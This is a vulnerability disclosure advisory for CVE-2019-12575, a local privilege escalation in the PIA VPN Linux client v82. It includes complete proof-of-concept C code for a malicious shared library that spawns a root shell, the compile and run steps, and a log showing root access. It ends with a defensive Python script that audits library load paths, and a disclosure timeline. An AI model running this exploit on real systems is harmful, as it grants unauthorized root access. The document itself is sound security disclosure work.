CVE-2019-12575.txt
Title: PIA Linux, macOS Privilege Escalation: Shared Object Injection
Author: Rich Mirch
CVE: CVE-2019-12575
Vendor Advisory: N/A
Description
A vulnerability in the London Trust Media Private Internet Access (PIA) VPN
Client v82 for Linux could allow an authenticated, local attacker to run
arbitrary code with elevated privileges.
The PIA Linux binary root_runner.64 is setuid root. This binary executes
/opt/pia/ruby/64/ruby which in turn attempts to load several libraries under
/tmp/ruby-deploy.old/lib. A local unprivileged user can create a malicious
library under this path to execute arbitrary code as the root user.
CVSS
Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:F
Base: 7.8
Temporal: 7.6
Test Environment
OS: Ubuntu 18.04.1 LTS
Kernel: 4.15.0-29-generic
PIA Version: v82
Steps to reproduce
All steps are executed as a low privileged user.
Step 1 - Create the following directory
mkdir -p /tmp/ruby-deploy/lib/ruby/2.4.0/enc
Step 2 - Create woot.c to execute a shell when loaded
cat >woot.c<<EOF
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
void woot(){
setreuid(0,0);
execl("/bin/sh","/bin/sh",NULL);
}
EOF
Step 3 - Compile the malicious library
gcc -fPIC -o woot.o -Wall -c woot.c
gcc -Wall \
-shared \
-Wl,-soname,encdb.so.so \
-Wl,-init,woot \
-o /tmp/ruby-deploy/lib/ruby/2.4.0/enc/encdb.so.so woot.o
Step 4 - execute root_runner.64
/opt/pia/root_runner/root_runner.64
Example
user1@woot:~$ id
uid=1001(user1) gid=1001(user1) groups=1001(user1)
user1@woot:~$ ./pia-ruby-exploit.sh
+ LIBPATH=/tmp/ruby-deploy/lib/ruby/2.4.0/enc
+ mkdir -p /tmp/ruby-deploy/lib/ruby/2.4.0/enc
+ cat
+ gcc -fPIC -o woot.o -Wall -c woot.c
+ gcc -Wall -shared -Wl,-soname,encdb.so.so -Wl,-init,woot -o /tmp/ruby-deploy/lib/ruby/2.4.0/enc/encdb.so.so woot.o
+ /opt/pia/root_runner/root_runner.64
# id
uid=0(root) gid=1001(user1) groups=1001(user1)
#
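The precondition this advisory describes, a privileged loader searching for libraries under a path that any local user can create, can be checked for mechanically. The following Python is an added example, not code from the advisory or from the PIA client: it walks every component of a library path from a trusted prefix down to the file and flags any component that is not owned by a trusted uid, is writable by group or others, or is a symlink. To show both outcomes it builds a constructed miniature tree (a sticky 1777 "tmp" holding the advisory's ruby-deploy/lib/ruby/2.4.0/enc/encdb.so.so path beside a locked-down "opt"). The function and directory names are assumptions of this example, not the vendor's.

```python
"""Audit whether a shared-library path is safe for a privileged process.

Added example (not part of the advisory or the PIA client). Rule applied:
every component from a trusted prefix down to the library itself must be
owned by a trusted uid, must not be writable by group or others, and
must not be a symlink. A sticky world-writable directory such as /tmp
fails this test, which is the condition the advisory describes.
"""
import os
import stat
import tempfile


def _components(path, prefix):
    """Return [prefix, prefix/a, prefix/a/b, ..., path] as absolute paths."""
    path, prefix = os.path.abspath(path), os.path.abspath(prefix)
    if os.path.commonpath([path, prefix]) != prefix:
        raise ValueError(f"{path} is not under {prefix}")
    comps = [prefix]
    rel = os.path.relpath(path, prefix)
    if rel != ".":
        cur = prefix
        for part in rel.split(os.sep):
            cur = os.path.join(cur, part)
            comps.append(cur)
    return comps


def audit_load_path(path, trusted_uids=None, trusted_prefix="/"):
    """Return a list of findings; an empty list means every component of
    `path` is owned by a trusted uid and writable only by its owner.
    By default root and the current effective uid are trusted, and
    components above `trusted_prefix` are assumed to have been checked
    already (the default prefix "/" checks the whole path)."""
    if trusted_uids is None:
        trusted_uids = (0, os.geteuid())
    findings = []
    for comp in _components(path, trusted_prefix):
        try:
            st = os.lstat(comp)
        except FileNotFoundError:
            # A missing component under a writable parent is the injection
            # case: whoever can write the parent chooses what appears here.
            findings.append(f"{comp}: does not exist")
            break
        if stat.S_ISLNK(st.st_mode):
            findings.append(f"{comp}: is a symlink")
        if st.st_uid not in trusted_uids:
            findings.append(f"{comp}: owned by uid {st.st_uid}, not trusted")
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append(
                f"{comp}: writable by group/other (mode {oct(st.st_mode & 0o7777)})")
    return findings


def build_demo_tree():
    """Construct a miniature filesystem under a temp dir (constructed sample
    data, not a real install): a sticky world-writable 'tmp' mirroring the
    advisory's path, and a locked-down 'opt'. Returns (base, safe, unsafe)."""
    base = tempfile.mkdtemp()
    enc = os.path.join(base, "tmp", "ruby-deploy", "lib", "ruby", "2.4.0", "enc")
    os.makedirs(enc)
    unsafe = os.path.join(enc, "encdb.so.so")
    safe_dir = os.path.join(base, "opt", "vendor", "lib")   # hypothetical vendor dir
    os.makedirs(safe_dir)
    safe = os.path.join(safe_dir, "libsafe.so")
    for lib in (unsafe, safe):
        open(lib, "wb").close()
        os.chmod(lib, 0o644)
    # Normalise directory modes regardless of the caller's umask ...
    for dirpath, _, _ in os.walk(base):
        os.chmod(dirpath, 0o755)
    # ... then make 'tmp' look like a real /tmp (1777: sticky, world-writable).
    os.chmod(os.path.join(base, "tmp"), 0o1777)
    return base, safe, unsafe


if __name__ == "__main__":
    base, safe, unsafe = build_demo_tree()
    for lib in (safe, unsafe):
        result = audit_load_path(lib, trusted_prefix=base)
        print(lib, "->", result or "OK")
```

Run as an ordinary user, the "opt" library passes and the "tmp" one is reported at the world-writable tmp component. Pointing the check at a real path with the defaults (prefix "/", trusted uids root and the current effective uid) gives the test a setuid wrapper or an auditor can apply to any directory before code is loaded from it.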
Timeline:
2018-12-16: Reported to vendor
2018-12-16: Vendor acknowledged receipt of report
2019-01-18: Vendor states a fix will be available in v83; however, this version was never released.
The desktop client was re-written. Upgrade to v1.2.1+ of the new client.
2019-06-10: Public disclosure